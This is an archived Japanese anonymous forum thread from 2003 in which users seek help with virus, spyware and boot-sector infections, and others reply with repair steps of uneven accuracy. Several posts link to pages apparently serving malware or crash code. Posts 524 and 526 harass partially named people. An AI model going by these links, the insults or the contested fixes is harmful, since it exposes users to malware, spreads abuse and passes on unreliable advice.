ただ ちゅうこくしただけなのに あきれかえるほどの きれぶりだな。

そういやぁ いぜんも ぶらすたーかんけいで ちょんぼしてなかったか?

しゅうまつは だんなは ごぜんさまで ひまなのか? 

505 :名無しさん@お腹いっぱい。:03/11/28 18:59
>>503
2000とXPは、システムパーティションに署名を書き込むから、fdisk /mbrをやると
クリアされて起動しなくなるよ。やるのなら、回復コンソールを起動してからfixmbr。
これなら、署名の部分はクリアされない。
MBMが、MBRの後ろの方の空き領域も使っているの解らないのかな?
BIOSから起動される、ブートプログラムをきちんと上書きしているのに、ウイルスが消えないわけないでしょ!

起動のメカニズムをきちんと勉強して来い!
http://nobumasa-web.hp.infoseek.co.jp/index.html


506 :名無しさん@お腹いっぱい。:03/11/28 19:06
>>503
そのブートメニューが出てくるということは、フォーマットしてからインストールしてないな。
それに、Meの入っているパーティションを非表示設定にもしていない。
いずれにしても、不勉強!

507 :名無しさん@お腹いっぱい。:03/11/28 19:40
教えてください。
今日、MSNのメールに
差出人:Shay 件名:Re: burdened with your budgets
とゆうメールが届いてました。
開いてみると、いきなりPCが落ちて再起動・・・
とりあえずノートンでスキャンしてみましたが感染は見つかりませんでした。
OSはwindowsXPでノートンインターネットセキュリティを使ってます。
2回開いてみましたがやっぱり再起動してしまいます。
何なんでしょうか?
怖いです・・・

508 :464(感染中):03/11/28 20:14
指摘サンクスです。勉強になります。
<505さん 2000初めて使うので、fixmbrと9x系のfdisk /mbrを混同していたようです。
<506さん インストール直後は選択画面はなかったのに、後から出てきたんですが。。
     パーティション非表示設定とはマスクではだめということでしょうか?
     ちなみにW2000Pを入れるのに成功したHDDはMeとは別のです。

どのみち、どのHDDも付けない状態で、CMOSクリア後に、ディスプレイ起動画面で
ウィルスが原因と思われる”fに似た水色文字が出力される”現象は直りませんでした。
これは何処に原因があるんでしょう。。。


     

509 :名無しさん@お腹いっぱい。:03/11/28 22:05
symantecのオンラインスキャンをしたらLive2chのlogのdatが以下のウイルスに感染してました。
・Macro.src
・VBS.Network.E
・VBS.LoveLetter.A
・VBS.Internal
・VBS.LoveLetter.Var
ほっといても大丈夫ですか?


510 :名無しさん@お腹いっぱい。:03/11/28 22:15
>>505
起動しなくなるなんて事は無いぞ

511 :名無しさん@お腹いっぱい。:03/11/28 22:15
>509
>2

512 :名無しさん@お腹いっぱい。:03/11/28 22:43
>>511
サンクスです。

513 :名無しさん@お腹いっぱい。:03/11/28 23:57
TCP Monitor Plusというのを入れてみたところnetstatで

TCP 192.168.0.2: 4934 (自分のPC名) -> 192.168.0.1:49320 (192.168.0.1) ->TIME WAIT -> [System Process](0)
TCP 192.168.0.2: 4938 (自分のPC名) -> 192.168.0.1:49320 (192.168.0.1) ->TIME WAIT -> [System Process](0)
TCP 192.168.0.2: 4941 (自分のPC名) -> 192.168.0.1:49320 (192.168.0.1) ->CLOSE WAIT -> svchost.exe(968)

UDP 0.0.0.0: 445 (自分のPC名: microsoft-ds) -> System(4)
UDP 0.0.0.0: 500 (自分のPC名: isakmp) -> lsass.exe(760)
UDP 0.0.0.0: 1037 (自分のPC名: 1037) -> svchost.exe(1148)
UDP 0.0.0.0: 1311 (自分のPC名: 1311) -> svchost.exe(1148)
UDP 0.0.0.0: 2194 (自分のPC名: 2194) -> svchost.exe(1148)
UDP 0.0.0.0: 2207 (自分のPC名: 2207) -> svchost.exe(1148)
UDP 127.0.0.1: 123 (localhost: ntp) -> svchost.exe(968)
UDP 127.0.0.1: 1051 (localhost: 1051) -> svchost.exe(968)
UDP 127.0.0.1: 1900 (localhost: 1900) -> svchost.exe(1176)
UDP 127.0.0.1: 4882 (localhost: 4882) -> Abone.exe(3612)
UDP 192.168.0.2: 123 (自分のPC名: ntp) -> svchost.exe(968)
UDP 192.168.0.2: 137 (自分のPC名: netbios-ns) -> System(4)
UDP 192.168.0.2: 138 (自分のPC名: netbios-dgm) -> System(4)
UDP 192.168.0.2: 1900 (自分のPC名: 1900) -> svchost.exe(1176)

という感じのが出てきました
svchostというのがやたらと出てきてますが危険なところとかありますか?


514 :513:03/11/29 00:04
すみませんスレ違いでした

515 :名無しさん@お腹いっぱい。:03/11/29 02:37
いまのHDD全部捨てて、新しいのかってこいよ
Meなんかつかってんなよヴォケ



516 :名無しさん@お腹いっぱい。:03/11/29 02:45
>>508
fdisk /mbrを実行して、2000やXPで起動不能になることはないようです。
実験して確かめてみました。どうもすみません。

517 :名無しさん@お腹いっぱい。:03/11/29 02:54
この2ヶ月弱、勝手にデスクトップ上に「~」とタイトルされたショートカットが勝手に作成され存在します。
何度削除しても、インターネット接続すると勝手に作成されているようです。
関係ないとは思いますが始まった時期はちょうどヤフーBB開設した頃とかぶります。
また同時期から接続状況が悪くなることがしばしば。
かなり重くなり動作環境悪くなったがノートン設定したせいかBBのせいかと思っていました。
これはウイルスでしょうか?他のものでしょうか?

518 :464(感染中):03/11/29 03:37
<516様 私は9X系でマルチしていたので詳しいことは実際わかりません。
    ただ以前から上記ホームページである程度読んでいたくらいです。
    MBR内のどのあたりが2000等の署名の部分かはよくわかりませんが、
    パーティションテーブルの前までをFdisk/MBRで戻すことは知って
    いましたので、Fixmbrも同じだと勘違いしていました^^;

無事2台ともWin2Kを『CMOSクリア、未感染9x起動FDでパーテション操作、
再起動の度にノートンCDでウィルス確認(CDブート)、OSインストール』を入れました。
インストールの合間に一度だけ再びEek(b)を発見したので、依然感染していると
思います。W2Sの起動FDとCDがインストールでうまく作動しないので感染は確実です。
起動画面のバグ文字”f”も消えてないので、どこかにはまだいるはずなんですがーー;
ハードディスク内ではなく、他の所にいると思うんですがPC自作した経験等ないので無知。。


519 :名無しさん@お腹いっぱい。:03/11/29 04:01
>>518
BIOSを破壊するウイルスも実際には、存在するが感染する確立は非常に低いと思われる。
インストールがうまく行かないのは、周辺機器で余分なものを繋いでいないか?
最小構成でインストールしてみること。
それでもダメなようなら、本当にBIOSがやられているのかもしれないが、その場合はメーカー修理になるでしょう。

520 :名無しさん@お腹いっぱい。:03/11/29 04:06
>>518
メモリは異常ないのかな?
Meと違って2000は結構シビアだから、そのせいでインストールできない可能性もある。

521 :464(感染中):03/11/29 05:27
<516様 Fdisk/mbrは2000のシグニチャをクリアするはずです。
    実際NTも2kも使用したことが無いので知りませんが。。
    何らかの形でシグニチャを上書きコピーできればいい筈ですね。
    9xOSで上書きするにしてもまずFdisk/mbrコマンドする”前に”、
    9xOsでダンプしてみて、2000シグニチャのメモを取り、Fdisk/Mbr後
    に再度書き直すか、2000用起動ディスクがあればFixmbr(?)コマンドで
    MBRを回復させればいいということです。私の場合、起動ディスクも
    信用できない可能性があるので手動回復法も考慮すべきなんですが。

522 :464(感染中):03/11/29 06:34
<519様 ありがとうございます。ブート感染型にこの2つのプログラムは
    分類されているようですが、Bios ROMまで感染するなんて、、、
    とは思っています。マザー買った事なくてよくわからないんですが、
    このウィルスはPOSTのビデオカードの初期化段階で変な文字を画面に
    出力していますので、できれば疑いたくないんですが。しかもBiosRomは
    リフレッシュできるのかなぁ、なんて。(鬱)
<518様 メモリ自体はメルコの新品と、もう一戸使ってるマザーも9xでは大丈夫
    なんですが。。。  

ちなみに話がそれますが、W2kインスト後にMBMをMBRに上書きしても問題なく、
MBMのプログラムはMBRプログラム部分を書き換えますが、2000の署名は
書き換えません。しかし”Fdisk/mbrはWindows2000導入時で使うと”、通常は
起動ディスクによるFixmbr等の処置を施さないと、駄目かも知れません。
実験してないので知りませんが、MSの方でシグニチャに配慮してある場合は別です。
以上記述516の注意点まで。(>http://www.tky.3web.ne.jp/~applause/mbm/ 等)


523 :名無しさん@お腹いっぱい。:03/11/29 10:49
>>517
http://homepage2.nifty.com/winfaq/c/oetrouble.html#1475

524 :名無しさん@お腹いっぱい。:03/11/29 12:41
山崎へ
お前日本人じゃないだろ。ハーフだよな。n&hの。
ついでにゲイだろ。
何が面白くて日本をターゲットにしてるんだよ。
お前がウイルスを作る理由、ただ単にどっかの誰かさんに対する
ジェラシーと束縛じゃねーか。そんな馬鹿な理由で世界中のPCを
めちゃくちゃにして何が楽しいんだ。
ゲイやバイを否定するわけじゃない。恋愛なんて同性異性同じだから。
ただし、お前のようにゲイで、嫌がってる相手をいつまでも追いかけて
嫌われて、それをウイルスのメッセージに載せて何が楽しいって言うんだ。

恋愛なんてな、片方が嫌ったら終わりなんだよ。それでも追いかけたら
ただのストーカーだろーが。
Sの性格お前知ってるだろーが。
ただ、寂しいだけだよ。お前のことを本当に好きだったら、絶対に浮気しない
それが恋愛じゃないのか?
遊びなら浮気はわかる。
でも、あいつ遊びじゃなかった。携帯の留守電も消してなかった。
7/8のウイルスはお前が彼とマカオに一緒にいっただろーが。
言いたい事もいえない訳?
幾つだよお前。

いちいちな、そんな下らない事でウイルス作るのやめろ。
お前は俺が誰だかしってるよな。電話でも話ししたくらいだしな。








525 :名無しさん@お腹いっぱい。:03/11/29 15:51
ttp://www.geocities.co.jp/SiliconValley-Bay/8528/sorce/burakura-sorce.txt
を踏んでしまったのですが、こうやって2chが見れてるということは大丈夫でしょうか?

526 :名無しさん@お腹いっぱい。:03/11/29 16:26
Sへ
どうやら、メッセージが消えたようだ。

山崎が好きなら好きでComing Outしろ。いいかげん。
お前ら二人、好きなら好き。嫌いなら分かれる。
遊びだって分かってる浮気位許せ。相手が本気の相手を見つけたんだったら
お前がわるい。それだけ、うざいってこと。
その位バカでもわかる。

日本人のバカはフォロアー
Bへ
お前、来年就職だろ。人生こんな事で棒にふるなよ。一応国立いってんだろ。
ざ○が呆れてました

国○へ
うざい、40過ぎてストーカーしてるんじゃねーよ。
金が無いから隣の家から電話線引っ張ってる時点で犯罪者なんだよ。
そんな事しながらネットしてる奴、中学生でも相手にしない。
さっさと北海道帰れ!!!!!!
気持ち悪い

527 :名無しさん@お腹いっぱい。:03/11/29 22:51
Eメールはかれこれ3年程利用していますが
ダイレクトメール(?)から初めてウィルスが検出されますた!!
今まで本当にこういうの来てなかったんで
なんかねぇ、ちょっとうれしいような

で、質問なんですが・・・
W32.Klez.H@mm
ウィルス名:
W32.Klez.H@mm
性質:
ワイルド

A special nice gameってのが来て、その2日後
A nice gameってのが来ました

これってどんなウィルスなんですか?
有名な奴でつか?

528 :名無しさん@お腹いっぱい。:03/11/29 23:29
あのさ、検出名出てるなら各種アンチウイルスメーカーなりぐぐるなりすれば出るよ。
KLEZは大流行してた。

529 :名無しさん@お腹いっぱい。:03/11/29 23:31
>>517
よくあるFAQらしい。
http://winfaq.jp/ で検索どうぞ。
デスクトップに ~ というファイルが作成されます

530 :名無しさん@お腹いっぱい。:03/11/29 23:54
>>529
>>523

531 :名無しさん@お腹いっぱい。:03/11/30 04:53
マスターブートレコードの上書きは、

     fdisk /MBR

じゃないのか? マイクロソフトのOS
でも大文字・小文字の区別はあるぞ。

…って釣られたのか?

532 : :03/11/30 16:55
http://www.st.ryukoku.ac.jp/~kjm/security/memo/

http://www.microsoft.com/japan/technet/security/bulletin/MS03-048.asp
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/11.html#20031128_IE

http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00333.html
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00334.html
NAI VirusScan JS/Exploit-WhoFramed
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00323.html
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00332.html
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00329.html
NAI VirusScan JS/Exploit-FileProxy
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00324.html

533 :proof-of-concept for an exploit:03/11/30 16:57
ファイルを分析しました。送られたそれぞれのファイルについてわかったことを
以下に報告します。
ファイル名: MhtRedirLaunchInetExe-Demo.zip
ファイル名: mhtml_file_for_codebase_automated.htm
デベロッパーノート

MhtRedirLaunchInetExe-Demo.zip is a self-extracting zip file that contains a clean file.
mhtml_file_for_codebase_automated.htm This file is proof-of-concept for an exploit.
It is not viral but we suggest to delete it.
This file is contained by MhtRedirLaunchInetExe-Demo.zip.

(C)2003 シマンテック・セキュリティ・レスポンス
(P)2003 シマンテック・セキュリティ・レスポンス

534 :名無しさん@お腹いっぱい。:03/11/30 17:23
↑なんだこのコピペ荒らしは。

535 :PC歴半年:03/11/30 22:48
今晩は。友人から私のアドレスでウィルスが来たと言われました。
OSはXPです。

virusname: W32.Yaha.F@mm.enc

これはどういったウィルスですか?またアドレス帳のメアドを
全て削除した方がよいのでしょうか?レベルが低く申し訳ありませんが、
商売をしているので問題は深刻です。返答お待ちしています。

536 :名無しさん@お腹いっぱい。:03/11/30 22:58
205 :名無しさん@お腹いっぱい。 :03/09/28 23:20

ちなみにノートンの活動ログからウィルスは
「W32.YAHA.F@mm.enc」みたいです
これで調べて見ましたが自分と同じような症状が書かれていませんでした・・・

206 :薮パソユーザー ◆0fQkHdNop2 :03/09/28 23:26
>>205

私はさっきそれを削除しましたが今のところ問題ありませんけど。

207 :205 :03/09/28 23:31
>206
そうなると削除が原因じゃないって事ですかね・・・?
今日の2通は怖くて削除していません・・・

208 :薮パソユーザー ◆0fQkHdNop2 :03/09/28 23:32
>>205

削除が気持ち悪いなら、プロバイダーのサーバー上でnPOPというメール
ソフトで削除すれば良いです。フリーソフトです。
http://www.vector.co.jp/soft/win95/net/se104061.html

537 :名無しさん@お腹いっぱい。:03/11/30 23:08
>>535
最近のウイルスはメールアドレスを騙るので、その友人があまり詳しくないなら
ウイルスに騙されてるかも。
アンチウイルス入れて、定義ファイルを最新に保っていれば問題無い。

商売やっててこれを怠っているなら自業自得とあきらめて、今日はPCの電源切って、
朝一でバスターかノートン買ってきて入れるべし。

538 :名無しさん@お腹いっぱい。:03/11/30 23:10
>>536
薮パソユーザは嘘ばっかりついてるので、奴の発言は信用しないように。

539 :名無しさん@お腹いっぱい。:03/11/30 23:13
>535
ttp://www.symantec.com/region/jp/sarcj/data/w/w32.yaha.f@mm.html

メールの差出人を詐称する可能性あり。
あなたもオンラインスキャンをするなり、セキュリティソフトを入れるなりして、
自分のパソコンが感染してるか確認しなさい。

540 :名無しさん@お腹いっぱい。:03/11/30 23:24
アンチNOD厨嫌い ◆Tcp44q2AKA
が出現したら、ここに誘導してください。
NOD32隔離専門板 Part1
http://pc.2ch.net/test/read.cgi/sec/1070200779/

541 :名無しさん@お腹いっぱい。:03/12/01 00:13
>>536
ってゆうか藪感染したのかよ!!!!!!!!

542 :こいつ誰か殺してくれ:03/12/01 09:01
詳細: 侵入: Invalid Source IP Address
侵入者: 0.64.91.193
危険度: 低危険度
送信元 IP アドレス: 0.64.91.193。この IP アドレスは無効です。
送信先 IP アドレス: 224.0.0.2
プロトコル: IGMP.

アドレスをクリックすると攻撃者を追跡できます
この攻撃についての詳しい情報は シマンテックセキュリティレスポンスで入手できます
egion/jp/sa

543 :名無しさん@お腹いっぱい。:03/12/01 15:33
ttp://housecall.antivirus.com/housecall/start_jp.asp

で検索したところWORM_ANTINNY.Aに感染したものが6つあるらしいのですが
その場所には何もなく、対処の
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion\Run

ara-key= <ワームのファイルの場所> -StartUp
もなく、すでにWinny自体ありません。

この感染したものを探しても見つからないのですが、どうやって削除すれば
いいんでしょうか?


544 :名無しさん@お腹いっぱい。:03/12/01 15:42
>>543
警察にny使ってますと連絡する
すぐに対応してくれる・・・・・・・かもね!

545 :名無しさん@お腹いっぱい。:03/12/01 16:04
>>543ですが解決しました、無視してください

546 :名無しさん@お腹いっぱい。:03/12/01 16:06
>>543 お答えします!
アプリが調子悪くなると、一度アンインしてインスコしなおします。
これと同じやりかたをしましょう。
もう一度ANTINNYに感染し、AVソフト等を使い、手順1から頑張って削除
してください!  マジレスごめんみんな。

547 :名無しさん@お腹いっぱい。:03/12/01 16:10
>>543
ばかやろ〜〜〜〜!
誰かがオチ書く前に解決すんなよ〜〜〜!

548 :名無しさん@お腹いっぱい。:03/12/01 17:30
ブラクラを踏んでしまいそれがウィルスがあるものだと
オカ板勇気が無く見れない画像スレでわかったのですがウィルスの場所はどこに
あるんでしょうか。
踏んでしまったURLとそのブラクラの内容について
オカ板の方に教えていただいたのでコピペしておきます。

//www2.strangeworld.org/uedakana/sahra****.***
(****は番号違い、拡張子違いなど:ブラクラ&ウイルス:HTML_SUAR.)

549 :548:03/12/01 17:43
すいません まず検索してみます。
PC初めてなのであたふたしちゃいました。

550 :名無しさん@お腹いっぱい。:03/12/01 19:47
REDLOF.Aに感染してしまい、駆除はしたんですが、
ファイルのweb表示が出来なくなってしまいました。

再セットアプ以外に何かリカバリーする方法はありますか?
駆除方法は、レジストリから該当.dllの値を削除しました。
無知な為、これが悪かったのだろうか・・・・・・・。

551 :名無しさん@お腹いっぱい。:03/12/01 20:16
>>550
OSも、IEのバージョンも何もわからんので、なんとも言い難いが、
IEの修復、は、使えない?

552 :550:03/12/01 20:23
すんません。
OS98
IE6.02
です。
IEの修復って98でできるんですか?
お願いします

553 :名無しさん@お腹いっぱい。:03/12/01 20:24
(゚д゚)

554 :名無しさん@お腹いっぱい。:03/12/01 20:47
>>552
ttp://higaitaisaku.web.infoseek.co.jp/iesyuufuku.html

ここみて、修復か、再インストを試してみる?
んで、IEが、shell関係の壊れたレジストリを勝手に治してくれるのを期待するか。
(自分ならそうする。自信ないけど(w    でも、OS再インスコよりはいいっしょ。)

555 :554 追記:03/12/01 20:53
>>552
その前に、scanreg /fix 試してみるか?
つか、もしかウィルスにやられたのがここ数日なら、scanreg /restore もいいかも。

556 :552:03/12/01 21:01
>>554
再三のアドヴァイスありがとです!
やられたのは、最近なので、>555の方法で無理なら>554に挑戦したいと
思うんですが、正直、不勉強のために>555の意味がわかりません・・・・。
よかったら、もう少し詳しくお願いできますか?

557 :名無しさん@お腹いっぱい。:03/12/01 21:21
>>556
scanreg も知らずにレジストリいぢったのか‥‥(;´Д`)

http://homepage2.nifty.com/winfaq/c/hints.html#77

とりあえずこれやってみるヨロシ。
バックアップの日付は、ウィルスにやられる前で直近のを選んでね。

558 :552:03/12/01 21:32
>>557
ありがとございます!!
ウィルス退治に必死で、素人のクセにレジストリを削除するしかないと
清水の舞台から飛び降りる気持ちでやってしまいました。。。・゚・(ノД`)・゚・。
最悪、画像のプレビューが見れないぐらいは大した事ないので諦めます。
名無しの私に丁寧にお付き合い戴き、本当にありがとうございます!

559 :名無しさん@お腹いっぱい。:03/12/01 22:34
>>552
IEの修復は簡単に出来る。コンパネから「アプリケーションの追加と削除」を選び
IE6を選択し、「追加と削除」をクリックすると、
・Internet Explorer を修復する
・以前のWindowsの構成に戻す
というのが出てくる。

修復でだめなら、以前の構成に戻し、あらためてIEの最新バージョンをインストール
すればいいと思う。それでもダメならリカバリーだな。
一度もリカバリーしたことがなければ、この際やってみるのも一つの選択。


560 :552:03/12/01 23:15
>>559
レスが遅くなりましたが、ありがとうございます!!
すぐにでも試してみます!!

PC素人なので、普段この板には来ないんですが、ここの人たちの優しさに感激です!!
殺伐としたDjクラブ板とは大違いだ・・・・・・。

561 :名無しさん@お腹いっぱい。:03/12/02 19:08
IEを起動するとウィンドウが大量にというか無限に開いてフリーズしまいます。
キャッシュをすべて削除してみましたが直りません。
Javaを切れば大丈夫なんですが、それだと困るんで元を直したいです。

562 :名無しさん@お腹いっぱい。:03/12/02 19:22
>>561
ウィルス駆除ソフト、スパイウェア駆除ソフトは試したのか?

563 :名無しさん@お腹いっぱい。:03/12/02 21:15
>>562
レスありがとう御座います。
やっぱりそういうのに頼らないと無理でしょうか?
金が無いんでできれば・・・
ノートンとか買うにしても今すぐは無理なので。
お試し版系は全部つかっちゃったし・・・

564 :名無しさん@お腹いっぱい。:03/12/02 23:29
>>563
なんかブラクラくさいので再起動すれば直りそうな気もするが
とりあえず暫定対策は>2を読む。

恒久対策として
スパイウェア駆除はAD-aware、Spybotという有名どころはフリーソフト。
アンチウィルスソフトもAVG、avast、eTrustなどの優秀なフリーソフトが
ある。この板にそれぞれ専門スレがあるのでそこのテンプレでも読んで
導入検討。

565 :名無しさん@お腹いっぱい。:03/12/03 00:53
>>364
詳しいアドバイスありがとう御座います。
ではそれで頑張ってみます。
ちなみに再起動ではダメでした。

566 :名無しさん@お腹いっぱい。:03/12/03 00:58
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
┃364 ■ 名無しさん@お腹いっぱい。 ■ ■03/11/18 17:04■
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

馬鹿age

567 :名無しさん@お腹いっぱい。:03/12/03 01:40
今PestScanというのやったら76こほど見つかったんですけど、
まとめてあぽーんするにはどしたらいいでつか?

568 :名無しさん@お腹いっぱい。:03/12/03 02:26
>>567
>>564

569 :名無しさん@お腹いっぱい。:03/12/03 04:07
virtual bouncerに感染したみたいです。
ググってフリーの駆除ソフトを見つけ、(英語で)「駆除に成功しました」
と出たんですが、再起動するとまた発動します。
どうすれば完全に駆除できますか?
蛇足かもしれませんが、症状を書いておきます。
症状:広告がでまくり、やたらと重くなる。

570 :名無しさん@お腹いっぱい。:03/12/03 09:32
>>569
セーフモードでもう一度駆除してみては?

571 :名無しさん@お腹いっぱい。:03/12/03 12:16
ttp://www.geocities.co.jp/SiliconValley-Sunnyvale/7323/index.html
VAIO LXシリーズの増設解説サイトでよく訪問していたんですが
トロイのウイルス反応があるようになりました。
ノートンでは駆除、検疫はできなかったようで
OLEが多重起動するんですがそれ以外の実害はないでしょうか?

572 :569:03/12/03 14:30
>570
セーフモードでやってみましたが、無理でした。
トレンドマイクロのオンラインスキャンを使用したところ、
Adware.Portalscanと言うものにも感染していました。
やはりググって調べたんですが、駆除がうまく行かないです・・・。
このAdware.Portalscanはスパイウェアと言う奴ですかね?
一応スパイウェア専用ソフトはダウンロードして試したんですが・・・。
初期化しようかと思っています。

573 :名無しさん@お腹いっぱい。:03/12/03 14:34
>>568
反応が出るファイル名や内容がわからないとなんとも言えないが、
ノートンかけてるのにしつこく戻ってくるというのはソースコードに
誤反応してる可能性もある。

ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/581
など参考にしれ。

574 :名無しさん@お腹いっぱい。:03/12/03 16:26
>>569
だいぶ焦ってるようだがw、スタート→ファイル名を指定して実行→regedit(OK)
レジストリエディタで
HKEY_LOCAL_MACHINE/Software/Microsoft/
Windows/CurrentVersion/Run を開き、この↓キーを削除
"slmss" = "C:\Program Files\Common Files\slmss.exe"
再起動してslmss.exeを検索、見つけたらゴミ箱へポイ。
(゚д゚)ウマーとなるはず


575 :名無しさん@お腹いっぱい。:03/12/03 21:27
tb_setup.exeが勝手にネットに接続しようとします。
いろいろ検索した結果スパイウェアのようですが削除
するだけで大丈夫でしょうか?

576 :569:03/12/03 23:42
>574
ありがとうございます。教えられたとおりに最後まで実行してみました。
しかし、それでも発動します。
起動した直後にprogram filesを見てたら、STCと言うフォルダが勝手に出現しました。
中身を見るとslmssが入っておりました。
これが原因だと思うんですが、このSTCを恒久的に削除するにはどうすれば良いでしょうか?

577 :名無しさん@お腹いっぱい。:03/12/04 00:27
W32.Whiter.Trojanにやられました…。
即効発病したのですぐに止めましたが、マイドキュメントの中身を全部やられました…。

そこで質問なのですが、マイミュージックとマイピクチャのフォルダを復活させるにはどうすればよいのでしょうか。
専用のアイコンのフォルダに戻したいのですが…無理でしょうか。

あと、どのフォルダまでやられてるか確認方法などはないでしょうか。

WinXP Homeです。よろしくお願いいたします。

578 :577:03/12/04 00:28
すいません。復活の方法わかりました。
ちゃんと検索しないですいませんでした。

579 :名無しさん@お腹いっぱい。:03/12/04 01:35
>>569
自分なら、次は、その問題の"STC"なり、"slmss"でレジストリを検索して、怪しいキィを探す。で、そこからまた考える。
ま、これが正解という自信は、 ぜ ん ぜ ん  ないが。

Autoexec.bat System.ini Win.ini を見るのもいいかもしれん。

つーか、自分のOSぐらい書いとけ。
UI辺りの使い勝手は似てても、いざ事件が起きたときの細かい手順となれば、9x系とNT系で違ってくるんだから。

580 :名無しさん@お腹いっぱい。:03/12/04 02:27
すいませんが、ネットする場合に、クッキーやインターネットの一時ファイルが
まったく保存されません。
何でしょう?これはウイルスなのでしょうか?
あるサイトに行ってから、こういう症状が出るようになって、
毎回、そのサイトに、インタネットオプションで最初に行くように設定されます。
program filesにそれらしきものはありません。

OS XP
IE 6.02

581 :名無しさん@お腹いっぱい。:03/12/04 02:42
>>577
ウィールスなのでしょうかと思ったらスキャンしれ。アンチスパイ(Spybot Ad-awareなど)
の導入も勧める。その結果疑問があればまた質問しる。

582 :580:03/12/04 03:00
どうすれば、治るのでしょうか?
クッキーが保存されない、消去されるのは非常にウザイです。
スパイボットでスキャンしてみたところ、
色々感染していたみたいで、特定できません。


583 :580:03/12/04 03:02
それらしいのは、HitsLinkという奴でしょうか?

584 :580:03/12/04 03:07
連投すいません(汗
あとは、それらしいのはAlexa Relatedでしょうか。

585 :名無しさん@お腹いっぱい。:03/12/04 04:27
某研究者、コテハン諦めたようだw

586 :名無しさん@お腹いっぱい。:03/12/04 06:25
ウィルスかなIE6のツールのインターネットオプションが開きません>

587 :名無しさん@お腹いっぱい。:03/12/04 11:32
ウイルスに感染したっぽく、ウインドウを開いたり何かファイルを動作させたりする度に
1MBくらいの異様な勢いでどんどんHD容量が増えていくという症状が起きたのですが、
ウイルスバスターやオンラインスキャンで検索するもウイルスは見つからず
システム復元などを試してみたらとりあえずその症状は治ったみたいなんですけど
砂時計アイコンが頻繁に出たりと違和感が・・・
原因が知りたいのですが検索やウイルス対策系のページを見てもいまひとつ解らなくて
困っています・・・

OSはME、ブラウザはIE5.5です

588 :名無しさん@お腹いっぱい。:03/12/04 11:40
>>587
ウィルス対策ソフトを購入してきてインストールしなさい
さもないとウィルスを撒き散らす加害者だよ君は

589 :名無しさん@お腹いっぱい。:03/12/04 11:46
ウイルスバスターを入れているのですが・・・
もっと他のソフトのほうがよいんでしょうか?

590 :名無しさん@お腹いっぱい。:03/12/04 12:10
きちんと定義ファイルを更新しているのでしょうか?

591 :名無しさん@お腹いっぱい。:03/12/04 12:15
WindowsUpdate、ウイルスバスターの定義ファイル更新は行っています
しかしそれでも発見できないので、
もし症状からどういったタイプであるとか思い当たるものがあれば教えて頂きたいのです・・・

592 :名無しさん@お腹いっぱい。:03/12/04 14:52
>>587
じゃあウィルスではなくて他の原因では?
HDD容量が減るのではなくて増えるって空き容量が減るって事だよね?
それとも何かのファイルが消されて容量が増えてるかもしれないって事?

593 :藪パソユーザー ◆0fQkHdNop2 :03/12/04 19:03
>>580

ウィルスかなと思うならウィルスチェックしてください。

不具合はシステムの復元で直し、直ったのを確認してから一旦システム復元
を無効にし(復元ポイントにウィルスが含めれてる可能性があるから)、
その後再度復元機能を有効にしてWindowsやセキュリティーソフトを
updateし直してください。


594 :藪パソユーザー ◆0fQkHdNop2 :03/12/04 19:08
>>587

ウィルスでないなら、HDDの空き容量不足かも?
HDDの空き容量不足になるとスワップしづらくなって不具合が起きる
場合もあります。



595 :名無しさん@お腹いっぱい。:03/12/04 19:20
>>593
コピペ ウザ

最近、平和だったのに何で出て来るんだ?
だから、だんなに嫌われるんだよ!

596 :580:03/12/04 23:37
http://orange.only18plus.com/umax.htm
というサイトに行ってから、勝手に
リンクは作られてるし、クッキーが
明日とかに起動すると、昨日やったのが消えてます。
どういう症状なのでしょうか?
>>593
保存している画像や動画は消えないのでしょうか?

597 :580:03/12/04 23:43
CoolWWWSearchではないかと、思います。

598 :名無しさん@お腹いっぱい。:03/12/05 00:07
>>597
予想がついてるのであれば対応できるんじゃないの?

599 :名無しさん@お腹いっぱい。:03/12/05 00:20
藪パソユーザー ◆0fQkHdNop2は粘着アラシですのでご注意ください。

なんにでもアンチドート、復元ポイント実行、ネットラナー熟読を勧めます。
それで見当がつかないときは適当な嘘をいい、嘘がばれると、指摘者を
罵倒します。

 http://pc.2ch.net/test/read.cgi/sec/1068471471/110
 名前:薮パソユーザー ◆0fQkHdNop2 [] 投稿日:03/11/12 11:43
 > 本当にしつこい馬鹿がいますね。

藪パソのアフォデマレスには十分ご注意ください。

600 :577:03/12/05 17:10
>>581
ウイルスは全部消えてたみたいです。

その代わりboot.iniが消えていました…。
このウイルスでどこまで消えているか確認は出来ないのでしょうか…。

601 :580:03/12/06 00:14
>>598
違いました。
それらしいのをスパイボットで全て対処しました。
オンラインウイルス検索
http://housecall.antivirus.com/housecall/start_jp.asp
でも検索したが、見つかりませんでした。

こういう症状のウイルスはどういうものでしょう?
直す方法はシステムの復元しかないのでしょうか?

602 :580:03/12/06 01:00
「JAVA_BYTVERIFY.A」というウイルスらしいというのが分かりました。
是非、対処法を教えてください。今現在、感染中です。

603 :名無しさん@お腹いっぱい。:03/12/06 05:31
>>587
関係ないけど
1Mずつの増加によく気がついたね

604 :名無しさん@お腹いっぱい。:03/12/06 13:39
>>602
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JAVA_BYTVERIFY.A
ウィルスに感染したPCでネットに接続しているとしたら神経を疑う
君、加害者だよ

605 :名無しさん@お腹いっぱい。:03/12/06 20:34
見たことも無い相手からメールが来ました・・。
ウィルスメールでしょうか?
送信者Joshua 件名Subject 1

なんかすごいぁゃしぃこゃしぃ
誰か似たようなのが来た人はおられませんか?

606 :名無しさん@お腹いっぱい。:03/12/06 20:50
>>605
スパム(広告等)か何かじゃないですか?

607 :名無しさん@お腹いっぱい。:03/12/06 20:57
知らない相手からのメールなんてウイルスだろうとでなかろうと削除で問題無し
外国人からならなおさら

608 :580:03/12/06 23:32
